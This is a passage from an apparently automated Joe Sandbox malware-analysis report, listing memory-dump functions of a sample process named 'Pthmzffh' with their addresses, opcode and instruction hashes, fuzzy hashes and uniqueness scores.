                                                                      • Instruction Fuzzy Hash: F2D0C97290120DBF8F04DFE4C90189EB7FDDB45144B1045AA9909E7210EE315B506791
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 013AC290 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.517793346.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_13a0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a49b95b5ff52aabc8ef423df9d427e39311184e42e04d577dbe22064d548a659
                                                                      • Instruction ID: 16fd750b85b20f3e26a1873a78d60ead2b7de55a247ab1a6ccd9408eddb90e63
                                                                      • Opcode Fuzzy Hash: a49b95b5ff52aabc8ef423df9d427e39311184e42e04d577dbe22064d548a659
                                                                      • Instruction Fuzzy Hash: 75D0C97290120CEF8B10DFE8D94199EB7EDDB45104B1045AA9509D7210EA316B50A791
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C71AC58 Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9c147efbfd4b8c56295664bf660ca72c1ecbff590b4b9d8e2d724187b0c9217f
                                                                      • Instruction ID: e203eb894cb9b3881f6be2b07dffb0bfd52bc03ef450b7b0ccf355a0105a8ce4
                                                                      • Opcode Fuzzy Hash: 9c147efbfd4b8c56295664bf660ca72c1ecbff590b4b9d8e2d724187b0c9217f
                                                                      • Instruction Fuzzy Hash: B3D067F17092419BC301C614C858A65BBA59F9A344F29C0BD98499B2A6D72698178615
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C71C88E Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 610d0d44a036d0e2e05e34b8aa126f03c1a77f05ada531b496b0a07fa3b417f8
                                                                      • Instruction ID: 37b39d686f8dbcf10d11e9fe13a39b7cb32168cb61bab0c087b3d36fc05dcd82
                                                                      • Opcode Fuzzy Hash: 610d0d44a036d0e2e05e34b8aa126f03c1a77f05ada531b496b0a07fa3b417f8
                                                                      • Instruction Fuzzy Hash: A6D0C9752081119F9204CF44EA41C6AB7A2EBC8A10B15C84EB84457310CA62DC17CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 013A82F6 Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.517793346.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_13a0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 00913029fb10e23a116e71f937c31e97c9d8e73a7687ab05204388f1da581a1e
                                                                      • Instruction ID: 5eb500892d1ff153307dc083777321a46fa7d18fe2b7febf4d11211db30105b7
                                                                      • Opcode Fuzzy Hash: 00913029fb10e23a116e71f937c31e97c9d8e73a7687ab05204388f1da581a1e
                                                                      • Instruction Fuzzy Hash: CAD0CA75208212AFD645CF54EA41CAAF7E6EBC8B10B10C80EB88153614CB32DC17CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C719D81 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: aa20e31ceeb63347317a58253e45e0493876eeb4891ffc8a863af644338a27d3
                                                                      • Instruction ID: 56737bca5a249341b8d2fcfec2800f7cfeabd6791547b2dca24d7c1e3ccb4c87
                                                                      • Opcode Fuzzy Hash: aa20e31ceeb63347317a58253e45e0493876eeb4891ffc8a863af644338a27d3
                                                                      • Instruction Fuzzy Hash: 0EC092C7C492808FF30762702EA72D02FA6E82701978B8ECAD8828F157A10C9E075762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C71C890 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                                      • Instruction ID: 48e8204161933d4df9c7b41a33249025f43fd015cf28c75e97648b457401bf24
                                                                      • Opcode Fuzzy Hash: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                                      • Instruction Fuzzy Hash: 84D012752081119F9204CF44E940C6BF7E6EFC8B10B14C84EB84053310CA72DC17CBB2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5F77C0 Relevance: .0, Instructions: 11COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                                                                      • Instruction ID: 0a79cfcc9f3950630def7aa8d5064f7db411a5ec17eeb1af5eeabda724e68817
                                                                      • Opcode Fuzzy Hash: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
                                                                      • Instruction Fuzzy Hash: 8EC012752082209F9244DA08C840C66B3AAFBC8210B14C84EE85083300CBA2EC07CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5FAA30 Relevance: .0, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6eadcd937c80644866c7b23d743e8fb6a234c8ce7b0d54c94a30b0f23e374f99
                                                                      • Instruction ID: 05cb404b78e1afe9c9fb0e690777ba38638d444e37569e5dab47610b2836fda3
                                                                      • Opcode Fuzzy Hash: 6eadcd937c80644866c7b23d743e8fb6a234c8ce7b0d54c94a30b0f23e374f99
                                                                      • Instruction Fuzzy Hash: 2AC02B01C0D3C04EEF5297A15A8820AFF51AA03334F195FC68073850E3C91484419111
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C71C750 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                      • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 013AD2E8 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.517793346.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_13a0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                      • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C719F08 Relevance: .0, Instructions: 7COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7866d2e932a2fb91c883b0a97a3bf838cc797b9806e411c577f2c7e786e274b3
                                                                      • Instruction ID: d89613ab82bf9724f04ec7dfa87bebe1ffb748d3a106ac4669853fc0ef8b380f
                                                                      • Opcode Fuzzy Hash: 7866d2e932a2fb91c883b0a97a3bf838cc797b9806e411c577f2c7e786e274b3
                                                                      • Instruction Fuzzy Hash: 00B0123000420E8BC680BBE0F4059AC331D9540648B804921F05C4A9169AA92A58878C
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C71ECB0 Relevance: .0, Instructions: 5COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                      • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                      • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                      • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C71E000 Relevance: .0, Instructions: 5COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                      • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                      • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                      • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C71C1E0 Relevance: .0, Instructions: 5COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                      • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                      • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                      • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C71C692 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                      • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                                                      • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                      • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C71EF12 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                      • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                                                      • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                      • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C71F7F2 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                      • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                                                      • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                      • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C71D3E0 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                      • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                                                      • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                      • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%